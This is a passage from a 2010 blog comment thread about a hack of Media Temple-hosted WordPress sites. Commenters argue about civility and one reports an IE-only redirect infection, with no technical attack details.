      After the last response from Travis, I had let this issue go. I was glad to see his response, and know that more comments, traffic, keywords… to this page just make it come up more in Google searches which is what they don’t want, so I was trying to give them that.

      PS. Gemma, notice I never stooped so low as to sling insults at MT. I suggest if you want to have this conversation, you do the same.

  25. Ash Blue October 10, 2010

    Just got hit today with a similar redirect that targets IE browsers only. Looks like it was hacked the same way that Media Temple WordPress sites were last time. I looked at CSS Tricks, but I didn’t see any IE problems. Might want to double check though (can never be too sure about these things).

Comments are closed. Contact us with any critical information. Thank you!
